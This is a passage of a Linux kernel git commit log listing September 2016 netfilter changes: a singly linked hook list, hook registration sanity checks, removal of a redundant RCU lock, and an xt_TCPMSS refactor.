<fgao@ikuai8.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 14:54:01 +02:00
Aaron Conole	e3b37f11e6	netfilter: replace list_head with single linked list The netfilter hook list never uses the prev pointer, and so can be trimmed to be a simple singly-linked list. In addition to having a more light weight structure for hook traversal, struct net becomes 5568 bytes (down from 6400) and struct net_device becomes 2176 bytes (down from 2240). Signed-off-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 14:38:48 +02:00
Aaron Conole	d4bb5caa9c	netfilter: Only allow sane values in nf_register_net_hook This commit adds an upfront check for sane values to be passed when registering a netfilter hook. This will be used in a future patch for a simplified hook list traversal. Signed-off-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-24 21:30:19 +02:00
Aaron Conole	e2361cb90a	netfilter: Remove explicit rcu_read_lock in nf_hook_slow All of the callers of nf_hook_slow already hold the rcu_read_lock, so this cleanup removes the recursive call. This is just a cleanup, as the locking code gracefully handles this situation. Signed-off-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-24 21:29:53 +02:00
Gao Feng	50f4c7b73f	netfilter: xt_TCPMSS: Refactor the codes to decrease one condition check and more readable The origin codes perform two condition checks with dst_mtu(skb_dst(skb)) and in_mtu. And the last statement is "min(dst_mtu(skb_dst(skb)), in_mtu) - minlen". It may let reader think about how about the result. Would it be negative. Now assign the result of min(dst_mtu(skb_dst(skb)), in_mtu) to a new variable, then only perform one condition check, and it is more readable. Signed-off-by: Gao Feng <fgao@ikuai8.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-24 21:13:21 +02:00
David S. Miller	d6989d4bbe	Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net	2016-09-23 06:46:57 -04:00

1 2 3 4 5 ...

3618 commits